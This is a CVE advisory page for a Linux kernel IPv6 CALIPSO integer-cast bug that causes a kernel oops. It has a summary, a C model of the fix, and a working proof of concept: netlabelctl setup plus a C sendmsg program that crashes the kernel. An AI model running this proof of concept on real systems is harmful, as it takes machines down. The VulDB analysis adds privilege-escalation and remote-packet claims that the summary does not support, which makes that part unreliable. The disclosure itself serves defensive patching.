CVE-2025-71085 in Linux

Summary

by MITRE • 01/13/2026

In the Linux kernel, the following vulnerability has been resolved:

ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()

There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0).

The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead.

Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom.
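The cast described above and the "grow only" fix, modelled as an added example in plain C (not kernel code): __skb_cow() is reproduced with the kernel's unsigned headroom and int delta types, and the calipso_skbuff_setattr() caller is shown before and after a fix in the spirit of the description. NET_SKB_PAD is assumed to be 64 and the exact patched lines are not reproduced.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>

/* Assumed value; NET_SKB_PAD is architecture-dependent in the kernel. */
#define NET_SKB_PAD 64
/* Same shape as the kernel's ALIGN(): a negative int stays negative once its
 * magnitude reaches the alignment (-64 and below), otherwise it rounds up to 0. */
#define ALIGN_UP(x, a) (((x) + (a) - 1) & ~((a) - 1))

/* Model of __skb_cow(): headroom is unsigned int, delta is int, so a request
 * above INT_MAX passes the comparison yet yields a negative delta. The return
 * value is the nhead that pskb_expand_head() checks with BUG_ON(nhead < 0). */
static int model_skb_cow_nhead(unsigned int headroom, unsigned int cur_headroom)
{
    int delta = 0;
    if (headroom > cur_headroom)
        delta = (int)(headroom - cur_headroom); /* modulo 2^32 on GCC/Clang */
    return ALIGN_UP(delta, NET_SKB_PAD);
}

/* Pre-fix caller: skb_headroom(skb) + len_delta is evaluated as unsigned and
 * wraps past INT_MAX when len_delta is negative and exceeds the current headroom. */
static unsigned int requested_headroom_before_fix(unsigned int cur_headroom, int len_delta)
{
    return cur_headroom + (unsigned int)len_delta;
}

/* "Grow only" variant (hypothetical, following the fix description): a shrinking
 * option never asks skb_cow() for less than the current headroom. */
static unsigned int requested_headroom_after_fix(unsigned int cur_headroom, int len_delta)
{
    return len_delta > 0 ? cur_headroom + (unsigned int)len_delta : cur_headroom;
}

static int nhead_before_fix(unsigned int cur_headroom, int len_delta)
{
    return model_skb_cow_nhead(requested_headroom_before_fix(cur_headroom, len_delta), cur_headroom);
}

static int nhead_after_fix(unsigned int cur_headroom, int len_delta)
{
    return model_skb_cow_nhead(requested_headroom_after_fix(cur_headroom, len_delta), cur_headroom);
}

/* True when the pre-fix path would reach BUG_ON(nhead < 0). */
static bool would_oops_before_fix(unsigned int cur_headroom, int len_delta)
{
    return nhead_before_fix(cur_headroom, len_delta) < 0;
}

int main(void)
{
    /* Constructed sample: 32 bytes of headroom, CALIPSO rewrite shrinks the option by 80 bytes. */
    printf("before fix: nhead=%d oops=%d\n", nhead_before_fix(32, -80), would_oops_before_fix(32, -80));
    printf("after fix:  nhead=%d\n", nhead_after_fix(32, -80));
    printf("shrink by 40 (above -NET_SKB_PAD): nhead=%d\n", nhead_before_fix(32, -40));
    return 0;
}
```

A shrink smaller than NET_SKB_PAD still wraps the unsigned sum but ALIGN rounds the resulting delta up to 0, which is why the description requires delta <= -NET_SKB_PAD.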

PoC: Using the `netlabelctl` tool:

netlabelctl map del default
netlabelctl calipso add pass doi:7
netlabelctl map add default address:0::1/128 protocol:calipso,7

Then run the following PoC:

#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void)
{
    int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);

    // setup msghdr
    int cmsg_size = 2;
    int cmsg_len = 0x60;
    struct msghdr msg;
    struct sockaddr_in6 dest_addr;
    struct cmsghdr *cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len);
    msg.msg_name = &dest_addr;
    msg.msg_namelen = sizeof(dest_addr);
    msg.msg_iov = NULL;
    msg.msg_iovlen = 0;
    msg.msg_control = cmsg;
    msg.msg_controllen = cmsg_len;
    msg.msg_flags = 0;

    // setup sockaddr
    dest_addr.sin6_family = AF_INET6;
    dest_addr.sin6_port = htons(31337);
    dest_addr.sin6_flowinfo = htonl(31337);
    dest_addr.sin6_addr = in6addr_loopback;
    dest_addr.sin6_scope_id = 31337;

    // setup cmsghdr: an IPV6_HOPOPTS ancillary header carrying an 80-byte hop-by-hop options header
    cmsg->cmsg_len = cmsg_len;
    cmsg->cmsg_level = IPPROTO_IPV6;
    cmsg->cmsg_type = IPV6_HOPOPTS;
    char *hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);
    hop_hdr[1] = 0x9; // set hop size - (0x9 + 1) * 8 = 80

    sendmsg(fd, &msg, 0);
    return 0;
}


Analysis

by VulDB Data Team • 03/31/2026

CVE-2025-71085 is a critical kernel-level issue in the Linux networking stack, specifically in the IPv6 implementation's CALIPSO (Common Architecture Label IPv6 Security Option) processing routines. It manifests as a kernel oops: a BUG_ON assertion in pskb_expand_head() fires while calipso_skbuff_setattr() rewrites a socket buffer. The root cause is an integer wrap-around combined with an implicit cast when an oversized headroom value is requested during socket buffer manipulation. Because it crashes the kernel, the flaw is a denial-of-service risk and a significant threat to system stability and availability in networked environments.

The technical mechanism is an implicit integer cast inside __skb_cow() that lets a negative headroom delta reach the functions that follow. The check (headroom > skb_headroom(skb)) is meant to keep delta = headroom - skb_headroom(skb) non-negative, but when headroom exceeds INT_MAX the check passes while the difference, stored in an int, becomes negative. pskb_expand_head() then receives that negative value as its nhead parameter and trips BUG_ON(nhead < 0) at net/core/skbuff.c:2232. The affected code path is the CALIPSO handling in the IPv6 stack, where the kernel rewrites socket buffer attributes for security labeling.

The operational impact of CVE-2025-71085 extends beyond a single system crash, as it represents a potential vector for privilege escalation and system instability in environments where CALIPSO policies are actively configured and used. Attackers can reach the vulnerable path with crafted IPv6 packets carrying specially constructed CALIPSO options that are processed by the kernel. The netlabelctl commands in the proof-of-concept show that ordinary administration steps are enough to establish the conditions under which the bug triggers. The vulnerability affects Linux kernels with CALIPSO support and IPv6 networking enabled, which makes it particularly relevant for enterprise network infrastructure, firewalls, and security appliances that rely on labeling protocols.

Mitigation for CVE-2025-71085 combines immediate defensive measures with longer-term hardening. The primary fix changes the trigger condition in calipso_skbuff_setattr() so that skb_cow() is only ever asked to grow headroom, which prevents a negative headroom size from reaching __skb_cow(). System administrators should update to a kernel that carries the patched calipso_skbuff_setattr(). Network administrators should also review and restrict CALIPSO policy configurations, especially where external traffic is processed, since the vulnerability is triggered through IPv6 packet processing with CALIPSO headers. The fix aligns with CWE-191 (Integer Underflow) and addresses ATT&CK techniques related to privilege escalation and system stability compromise through kernel-level vulnerabilities. Organizations should additionally monitor for unusual IPv6 traffic patterns that may indicate exploitation attempts, and keep kernels patched to guard against similar integer handling bugs in other subsystems.

Responsible

Linux

Reservation

01/13/2026

Disclosure

01/13/2026

Moderation

accepted

CPE

ready

EPSS

0.00033

KEV

no

Activities

very low
